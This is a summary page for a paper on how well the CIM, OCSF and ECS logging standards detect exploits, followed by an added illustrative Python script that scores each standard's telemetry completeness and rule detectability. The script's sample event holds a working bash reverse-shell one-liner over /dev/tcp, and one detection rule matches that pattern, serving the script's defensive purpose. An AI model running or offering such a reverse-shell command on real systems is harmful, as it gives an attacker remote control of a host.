Beyond Collection: Measuring the Detection Efficacy of Modern Security Logging Standards
Ryan Holeman, John Hastings, Varghese Mathew Vaidyan

TL;DR
This paper systematically evaluates the effectiveness of modern security logging standards using a novel automated framework, revealing significant differences and gaps in their ability to detect cyber exploits.
Contribution
It introduces a new scalable methodology for evaluating logging standards and provides evidence-based insights for security practitioners.
Findings
Significant differences in logging standards' ability to detect exploits.
Identification of critical gaps in current security logging frameworks.
Development of a reproducible evaluation methodology for exploit telemetry.
Abstract
Effective security logging is crucial for the timely and accurate detection of cyber threats; however, the relative effectiveness of various industry-standard logging frameworks remains understudied. This paper addresses this critical gap by presenting the first systematic evaluation of modern security logging standards utilizing a novel methodology built upon the automated Security Exploit Telemetry Collection (SETC) framework. SETC systematically generates reproducible exploit scenarios in containerized environments, collecting rich telemetry across multiple logging standards, including CIM (Common Information Model), OCSF (Open Cybersecurity Schema Framework), and ECS (Elastic Common Schema). The detection efficacy of each logging standard is quantified by measuring telemetry completeness and exploit detectability across standardized logs through detailed experiments involving 50…
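The abstract names two quantities, telemetry completeness and exploit detectability, without (in the visible text) defining them. The following Python is an added example, not code from the SETC framework or the authors, showing one concrete way such scores can be computed: a single constructed endpoint event (a web server spawning a bash reverse shell) is projected onto ECS, OCSF and Splunk CIM field names, completeness is the share of raw sensor attributes that survive the projection, and detectability is the share of detection rules that can be evaluated and fire on the normalized event. The field names follow the public ECS, OCSF and CIM naming as this editor understands them, but which fields each mapping carries (in particular, that the OCSF Process Activity class and the CIM Endpoint.Processes model carry no destination endpoint on a process event) is an assumption made for illustration, as are the two rules and the metric definitions themselves.

```python
"""Added example (not the paper's SETC code): score three logging standards
on telemetry completeness and exploit detectability for one constructed
event. Field names follow public ECS / OCSF / Splunk CIM naming as best
understood; which fields each mapping carries, the sample event, the rules
and the metric definitions are assumptions made for illustration."""

# Constructed raw sensor event: a web server process spawns a bash reverse
# shell (the classic /dev/tcp one-liner).
RAW_EVENT = {
    "ts": "2024-01-01T00:00:00Z",
    "host": "web01",
    "user": "www-data",
    "pid": 4242,
    "ppid": 1337,
    "exe": "/bin/bash",
    "cmdline": "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "parent_exe": "/usr/sbin/apache2",
    "dst_ip": "10.0.0.5",
    "dst_port": 4444,
}

# standard field name -> raw sensor key. ECS is a flat namespace, so the
# sensor can attach destination fields to the process event; the OCSF
# Process Activity class and the CIM Endpoint.Processes model are ASSUMED
# here to carry no destination endpoint for a process event.
MAPPINGS = {
    "ECS": {
        "@timestamp": "ts", "host.name": "host", "user.name": "user",
        "process.pid": "pid", "process.parent.pid": "ppid",
        "process.executable": "exe", "process.command_line": "cmdline",
        "process.parent.executable": "parent_exe",
        "destination.ip": "dst_ip", "destination.port": "dst_port",
    },
    "OCSF": {
        "time": "ts", "device.hostname": "host", "actor.user.name": "user",
        "process.pid": "pid", "process.parent_process.pid": "ppid",
        "process.file.path": "exe", "process.cmd_line": "cmdline",
        "process.parent_process.file.path": "parent_exe",
    },
    "CIM": {
        "_time": "ts", "dest": "host", "user": "user",
        "process_id": "pid", "parent_process_id": "ppid",
        "process_path": "exe", "process": "cmdline",
        "parent_process_path": "parent_exe",
    },
}


def normalize(raw, mapping):
    """Project the raw event onto one standard's field names."""
    return {field: raw[key] for field, key in mapping.items() if key in raw}


def completeness(raw, mapping):
    """Share of raw sensor attributes that survive normalisation."""
    carried = {key for key in mapping.values() if key in raw}
    return len(carried) / len(raw)


def lookup(normalized, mapping, raw_key):
    """Fetch a semantic attribute from a normalised event, whatever the
    standard calls it; None means the standard dropped it."""
    for field, key in mapping.items():
        if key == raw_key:
            return normalized.get(field)
    return None


# Detection rules written once over semantic attribute names. Each returns
# True (fires), False (no match) or None (a needed field is missing, so the
# rule cannot be evaluated on this standard at all).
def rule_devtcp_shell(ev, mapping):
    cmd = lookup(ev, mapping, "cmdline")
    if cmd is None:
        return None
    return "/dev/tcp/" in cmd


def rule_webserver_child_to_high_port(ev, mapping):
    parent = lookup(ev, mapping, "parent_exe")
    port = lookup(ev, mapping, "dst_port")
    if parent is None or port is None:
        return None
    return parent.endswith(("apache2", "nginx", "httpd")) and port not in (80, 443)


RULES = [rule_devtcp_shell, rule_webserver_child_to_high_port]


def evaluate(raw=RAW_EVENT):
    """Per-standard completeness and detectability scores, plus the rules
    that were undecidable because the standard lacks a field they need."""
    report = {}
    for name, mapping in MAPPINGS.items():
        ev = normalize(raw, mapping)
        outcomes = {r.__name__: r(ev, mapping) for r in RULES}
        fired = sum(1 for v in outcomes.values() if v is True)
        report[name] = {
            "completeness": round(completeness(raw, mapping), 2),
            "detectability": fired / len(RULES),
            "undecidable": sorted(k for k, v in outcomes.items() if v is None),
        }
    return report


if __name__ == "__main__":
    for name, scores in evaluate().items():
        print(f"{name:5s} {scores}")
```

The useful output is the `undecidable` list rather than the bare scores: a rule that returns `None` on a standard points at a field the normalization dropped, which is exactly the kind of gap the abstract says the evaluation is meant to surface. Scaling this from one constructed event and two rules to the paper's reproducible exploit scenarios and real schema mappings is the part the SETC framework automates.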
